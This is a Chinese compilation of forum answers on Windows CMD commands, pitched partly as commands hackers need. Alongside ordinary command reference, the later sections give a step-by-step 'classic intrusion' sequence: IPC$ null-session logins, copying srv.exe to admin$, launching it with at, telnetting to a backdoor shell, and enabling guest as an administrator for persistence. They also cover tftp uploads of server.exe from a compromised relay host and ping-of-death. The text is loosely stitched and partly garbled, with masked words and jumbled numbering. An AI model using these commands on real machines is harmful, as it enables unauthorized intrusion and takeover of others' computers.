文章大纲：

• 1、求所有cmd命令含义及用法(包括net,ntsd,taskkill.....)
• 2、当黑客要懂得哪些主要的CMD命令?
• 3、黑客cmd命令
• 4、命令有哪些 黑客CMD Ping命令大全
• 5、跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

求所有cmd命令含义及用法(包括net,ntsd,taskkill.....)

1. ntsd

格式：c:ntsd -c q -p PID

只有System、 *** SS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的，最后那个是Win32子系统，ntsd本身需要它。

ntsd从2000开始就是系统自带的用户态调试工具，被调试器附着（attach）的进程会随调试器一起退出，所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限，从而能杀掉大部分的进程。ntsd会新开一个调试窗口，本来在纯命令行下无法控制，但如果只是简单的命令，比如退出(q)，用-c参数从命令行传递就行了。Ntsd 按照惯例也向软件开发人员提供。只有系统开发人员使用此命令。

用法：开个cmd.exe窗口，输入：ntsd -c q -p PID

把最后那个PID改成你要终止的进程的ID。如果你不知道进程的ID，打开任务管理器进程选项卡查看选择列勾上“PID（进程标识符）”，然后就能看见了。

WinXP下还有两个好东东：tasklist和tskill。

tasklist能列出所有的进程和相应的信息。

tskill能查杀进程。语法很简单：tskill 程序名。

2. replace

用来替换文件的replace连正在使用的文件也能替换，非常无敌。

比如：在c:下建一个目录：c:aaa，复制一首mp3到c:aaa并命名为c:aaaa.mp3，再复制另一首歌到c:a.mp3。用Media Player 播放c:aaaa.mp3，在命令提示符下输入：replace c:a.mp3 c:aaa。过一会，是不是播放的歌已变为另一首？

用这个命令来替换系统文件真是太爽了，并且WinXP的系统文件保护也对它无效，再也不用到安全模式下去替换文件了。

格式：

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]

REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

[drive1:][path1]filename 指定源文件

[drive2:][path2] 指定要替换文件的目录

/A：把新文件加入目标目录。不能和/S 或/U命令行开关搭配使用

/P：替换文件或加入源文件之前会先提示您进行确认

/R：替换只读文件以及未受保护的文件

/S：替换目标目录中所有子目录的文件不能与/A 命令选项搭配使用

/W：等您插入磁盘以后再运行

/U：只会替换或更新比源文件日期早的文件，不能与/A 命令行开关搭配使用。

网上找来了，可能多了点。

dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录

copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘

edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名

more 分屏显示 type 显示文件内容 rd 删除目录 sys *** DOS系统盘

ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性

fdisk 硬盘分区 date 显示及修改号期 label 设置卷标号 defrag 磁盘碎片整理

msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理

help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间

tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令符

prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘

不常用DOS命令

diskcomp磁盘比较 append 设置非执行文件路径

expand 还原DOS文件 fasthelp快速显示帮助信息

fc 文件比较 interink启动服务器

setver 设置版本 intersvr启动客户机

subst 路径替换 qbasic Basic集成环境

vsafe 防病毒 unformat恢复已格式化的磁盘

ver 显示DOS版本号 *** artdrv设置磁盘加速器

vol 显示磁盘卷标号 lh 将程序装入高端内存

ctty 改变控制设备 emm386 扩展内存管理

常用命令具体介绍:

一、Dir

显示目录文件和子目录列表，呵呵，这个当然是人人要知道的。

可以使用通配符（? 和 *），？表通配一个字符，*表通配任意字符

*.后缀

指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe

/p

每次显示一个列表屏幕。要查看下一屏，请按键盘上的任意键。

/w

以宽格式显示列表，在每一行上最多显示 5 个文件名或目录名。

/s

列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了

dir *.* - a.txt 把当前目录文件列表写入a.txt

dir *.* /s - a.txt 把当前目录文件列表写入a.txt，包括子目录下文件。

二、Attrib

显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用，则 attrib 会显示当前目录中所有文件的属性。

+r

设置只读属性。

-r

清除只读属性。

+a

设置存档文件属性。

-a

清除存档文件属性。

+s

设置系统属性。

-s

清除系统属性。

+h

设置隐藏属性。

-h

清除隐藏属性。

三、Cls

清除显示在命令提示符窗口中的所有信息，并返回空窗口，即“清屏”

四、Exit

退出当前命令解释程序并返回到系统。

五、format

格式化

/q

执行快速格式化。删除以前已格式化卷的文件表和根目录，但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。

六、Ipconfig

显示所有当前的 TCP/IP *** 配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。

/all

显示所有适配器的完整 TCP/IP 配置信息。

ipconfig 等价于 winipcfg，后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面，但可以使用“ *** 连接”查看和更新 IP 地址。要做到这一点，请打开 *** 连接，右键单击某一 *** 连接，单击“状态”，然后单击“支持”选项卡。

该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。

七、md

创建目录或子目录

八、Move

将一个或多个文件从一个目录移动到指定的目录。

九、N*stat

显示本地计算机和远程计算机的基于 TCP/IP (Net *** ) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。N*stat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 n*stat 显示帮助。N*stat 命令行参数区分大小写。

-a remotename

显示远程计算机的 NetBIOS 名称表，其中，RemoteName 是远程计算机的 NetBIOS 计算机名称。

-A IPAddress

显示远程计算机的 NetBIOS 名称表，其名称由远程计算机的 IP 地址指定（以小数点分隔）。

十、Netstat

显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息（对于 IP、ICMP、TCP 和 UDP 协议）以及 IPv6 统计信息（对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议）。使用时如果不带参数，netstat 显示活动的 TCP 连接。

-a

显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。

十一、Ping

通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情

况将和往返过程的次数一起显示出来。Ping 是用于检测 *** 连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数，ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。

-t

指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息，请按 CTRL-BREAK。要中断并退出 ping，请按 CTRL-C。

-lSize

指定发送的回响请求消息中“数据”字段的长度（以字节表示）。默认值为 32。size 的更大值是 65,527。

十二、Rename (Ren)

更改文件的名称。

例如 ren *.abc *.cba

十三、Set

显示、设置或删除环境变量。如果没有任何参数，set 命令将显示当前环境设置。

十四、Shutdown

允许您关闭或重新启动本地或远程计算机。如果没有使用参数，shutdown 将注销当前用户。

-m ComputerName

指定要关闭的计算机。

-t xx

将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。

-l

注销当前用户，这是默认设置。-m ComputerName 优先。

-s

关闭本地计算机。

-r

关闭之后重新启动。

-a

中止关闭。除了 -l 和 ComputerName 外，系统将忽略其它参数。在超时期间，您只可以使用 -a。

十五、System File Checker (sfc)

win下才有，在重新启动计算机后扫描和验证所有受保护的系统文件。

/scannow

立即扫描所有受保护的系统文件。

/scanonce

一次扫描所有受保护的系统文件。

/purgecache

立即清除“Windows 文件保护”文件高速缓存，并扫描所有受保护的系统文件。

/cachesize=x

设置“Windows 文件保护”文件高速缓存的大小，以 MB 为单位。

十六、type

显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件

十七、Tree

图像化显示路径或驱动器中磁盘的目录结构。

十八、Xcopy

复制文件和目录，包括子目录。

/s

复制非空的目录和子目录。如果省略 /s，xcopy 将在一个目录中工作。

/e

复制所有子目录，包括空目录。

十九、copy

将一个或多个文件从一个位置复制到其他位置

二十、del

删除指定文件。

ftp和bat批命令和net和telnet由于子命令太多，这里不说了，不过这几个都是常用到

当黑客要懂得哪些主要的CMD命令?

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \ip\c$ 登陆后映射对方C：到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具

有管理员权限,注意：***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上

参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip

协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的

用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设

置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]

数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之

ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，

ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装

目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安

装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏

、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文

件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名 移动文件,

用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件

中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参

数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成

3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指

ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件（所

有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名复制文件和目录树，用参数/Y将

不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二

进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二

进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示 *** 地址Network addres，子网掩码

Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理

性的MAC地址。arp -a将显示出全部信息

arp -s ip 物理地址 想ARP高速缓存中人工输入一个静态项目 ,该项目在计算机引导过程中将保持有效状态,或者出现错误的时候 人工配置的物理地址将更新本项目

arp -d ip 本命令能人工栓除一个静态项目

start 程序名或命令 /max 或/min 新开一个新窗口并更大化（最小化）运行某程

序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读

，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时

间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p 显示以P开头的环境变量

黑客cmd命令

这个可能你对黑客理解力才刚有言听认识吧，

CMD里有很多命令可以攻击，我给两个简单的你吧

1。net use \\IP\ipc$ "" /user:"" 这叫空连接，条件目标机器默认共享开放

2。telnet IP 回车 条件 目标机器TELNET服务以开

觉得可以就给分吧

命令有哪些 黑客CMD Ping命令大全

1. gpedit.msc-----组策略

2. sndrec32-------录音机

3. Nslookup-------IP地址侦测器 ，是一个 监测 *** 中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。

4. explorer-------打开资源管理器

5. logoff---------注销命令

6. shutdown-------60秒倒计时关机命令

7. lusrmgr.msc----本机用户和组

8. services.msc---本地服务设置

9. oobe/msoobe /a----检查XP是否激活

10. notepad--------打开记事本

11. cleanmgr-------垃圾整理

12. net start messenger----开始信使服务

13. compmgmt.msc---计算机管理

14. net stop messenger-----停止信使服务

15. conf-----------启动netmeeting

16. dvdplay--------DVD播放器

17. charmap--------启动字符映射表

18. diskmgmt.msc---磁盘管理实用程序

19. calc-----------启动计算器

20. dfrg.msc-------磁盘碎片整理程序

21. chkdsk.exe-----Chkdsk磁盘检查

22. devmgmt.msc--- 设备管理器

23. regsvr32 /u *.dll----停止dll文件运行

24. drwtsn32------ 系统医生

25. rononce -p----15秒关机

26. dxdiag---------检查DirectX信息

27. regedt32-------注册表编辑器

28. Msconfig.exe---系统配置实用程序

29. rsop.msc-------组策略结果集

30. mem.exe--------显示内存使用情况

31. regedit.exe----注册表

32. winchat--------XP自带局域网聊天

33. progman--------程序管理器

34. winmsd---------系统信息

35. perfmon.msc----计算机性能监测程序

36. winver---------检查Windows版本

37. sfc /scannow-----扫描错误并复原

38. taskmgr-----任务管理器（2000/xp/2003

40. wmimgmt.msc----打开windows管理体系结构(WMI)

41. wupdmgr--------windows更新程序

42. wscript--------windows脚本宿主设置

43. write----------写字板

45. wiaacmgr-------扫描仪和照相机向导

46. winchat--------XP自带局域网聊天

49. mplayer2-------简易widnows media player

50. mspaint--------画图板

51. mstsc----------远程桌面连接

53. magnify--------放大镜实用程序

54. mmc------------打开控制台

55. mobsync--------同步命令

57. iexpress-------木马捆绑工具，系统自带

58. f *** gmt.msc-----共享文件夹管理器

59. utilman--------辅助工具管理器

61. dcomcnfg-------打开系统组件服务

62. ddeshare-------打开DDE共享设置

110. osk------------打开屏幕键盘

111. odbcad32-------ODBC数据源管理器

112. oobe/msoobe /a----检查XP是否激活

68. ntbackup-------系统备份和还原

69. narrator-------屏幕“讲述人”

70. ntm *** gr.msc----移动存储管理器

71. ntmsoprq.msc---移动存储管理员操作请求

72. netstat -an----(TC)命令检查接口

73. syncapp--------创建一个公文包

74. sysedit--------系统配置编辑器

75. sigverif-------文件签名验证程序

76. ciadv.msc------索引服务程序

77. shrpubw--------创建共享文件夹

78. secpol.msc-----本地安全策略

79. syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

80. services.msc---本地服务设置

81. Sndvol32-------音量控制程序

82. sfc.exe--------系统文件检查器

83. sfc /scannow---windows文件保护

84. ciadv.msc------索引服务程序

85. tourstart------xp简介（安装完成后出现的漫游xp程序）

86. taskmgr--------任务管理器

87. eventvwr-------事件查看器

88. eudcedit-------造字程序

89. compmgmt.msc---计算机管理

90. packager-------对象包装程序

91. perfmon.msc----计算机性能监测程序

92. charmap--------启动字符映射表

93. cliconfg-------SQL SERVER 客户端 *** 实用程序

94. Clipbrd--------剪贴板查看器

95. conf-----------启动netmeeting

96. certmgr.msc----证书管理实用程序

97. regsvr32 /u *.dll----停止dll文件运行

98. regsvr32 /u zipfldr.dll------取消ZIP支持

99. cmd.exe--------CMD命令提示符

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的 *** 命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组